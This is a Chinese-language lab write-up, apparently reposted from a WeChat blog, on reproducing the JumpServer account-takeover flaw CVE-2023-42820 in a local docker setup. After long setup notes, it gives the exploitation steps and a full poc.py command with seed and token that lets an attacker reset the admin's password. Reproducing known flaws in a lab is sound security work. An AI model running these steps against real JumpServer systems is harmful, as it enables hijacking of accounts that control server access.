环境搭建
https://github.com/vulhub/vulhub/tree/master/jumpserver/CVE-2023-42820启动环境前,修改config.env中DOMAINS的值为你的IP和端口,如DOMAINS=your-ip:8080。比如我的虚拟机ip为192.168.23.135192.168.23.135:8080
docker-compose up -d
启动服务需要等待一段时间,之后访问http://your-ip:8080即可查看到Jumpserver的登录页面。我们使用admin作为账号及密码即可登录,第一次登录管理员账号需要修改密码。我这边等待了。说一下我这边的情况,我当时没启动成功。试了官方的docker,修改版本到3.6.3,执行成功。其中遇到过一个问题,就是kali的内存不够了。我当时给的2G,直接占满了。vulhub的docker迟迟无法启动估计也是这个原因。(后续重新测试了,还是有下面的问题
自己搭建
说一下如何通过jumpserver官方的docker搭建漏洞环境。https://github.com/jumpserver/Dockerfile/tree/master执行命令
# 测试环境可以使用,生产环境推荐外置数据
git clone --depth=1 https://github.com/jumpserver/Dockerfile.git
cd Dockerfile
cp config_example.conf .env
编辑 .env
vim .env
版本号根据自己需要变更,这里和vulhub保持一致,选择3.6.3
DOMAINS=your-ip:8080这样配置即可。
docker-compose -f docker-compose-network.yml -f docker-compose-redis.yml -f docker-compose-mariadb.yml -f docker-compose-init-db.yml up -d
docker exec -i jms_core bash -c './jms upgrade_db'
docker-compose -f docker-compose-network.yml -f docker-compose-redis.yml -f docker-compose-mariadb.yml -f docker-compose.yml up -d
最开始执行的时候会加载很多东西,耐心等待加载完成。同时推荐内存给的大一些,2G肯定是不行的。我这里用的8G。
之后访问8080端口如果不行,那就访问80端口。
漏洞复现用vulhub的poc即可。
漏洞复现
Jumpserver随机数种子泄露导致账户劫持漏洞 CVE-2023-42820
vulhub官方wp:https://github.com/vulhub/vulhub/blob/master/jumpserver/CVE-2023-42820/README.zh-cn.md
漏洞验证的整个过程:
https://media.githubusercontent.com/media/vulhub/vulhub/master/jumpserver/CVE-2023-42820/2.gif
右键新页面打开验证码,记住随机数
重新刷新页面,输入用户名与验证码
记住token
输入命令
下载地址:https://github.com/vulhub/vulhub/blob/master/jumpserver/CVE-2023-42820/poc.py
python poc.py -t http://192.168.23.135/ --email admin@mycomany.com --seed 6992559dbe6001da7138e52185582d2fd0dee2a2 --token hIQjciJuN8LlpsnIGXfGz6RZh3DJcBrYiHqT
成功获得验证码,在忘记密码中填入邮箱和验证码,输入新密码即可劫持用户
参考链接
p神博客:https://www.leavesongs.com/PENETRATION/jumpserver-sep-2023-multiple-vulnerabilities-go-through.htmlhttps://github.com/tarimoe/blackjumphttps://github.com/vulhub/vulhub/blob/master/jumpserver/CVE-2023-42820/
原文始发于微信公众号(进击的HACK):漏洞复现 | Jumpserver随机数种子泄露导致账户劫持漏洞 CVE-2023-42820
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论